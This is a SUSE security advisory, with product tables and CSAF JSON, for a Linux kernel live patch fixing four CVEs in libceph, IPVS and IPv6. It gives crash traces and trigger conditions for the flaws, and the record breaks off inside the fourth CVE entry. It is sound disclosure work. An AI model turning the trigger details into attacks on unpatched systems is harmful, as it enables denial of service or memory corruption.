| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.5 (High)
Affected products
Recommended
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
References
24 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 8 for SUSE Linux Enterprise 15 SP7)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150700.53.28 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1102,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1102,SUSE-SLE-Module-Live-Patching-15-SP7-2026-1106",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1102-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1102-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261102-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1102-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025010.html"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 8 for SUSE Linux Enterprise 15 SP7)",
"tracking": {
"current_release_date": "2026-03-27T08:05:21Z",
"generator": {
"date": "2026-03-27T08:05:21Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1102-1",
"initial_release_date": "2026-03-27T08:05:21Z",
"revision_history": [
{
"date": "2026-03-27T08:05:21Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP7",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T08:05:21Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T08:05:21Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_84-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_28-default-2-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T08:05:21Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
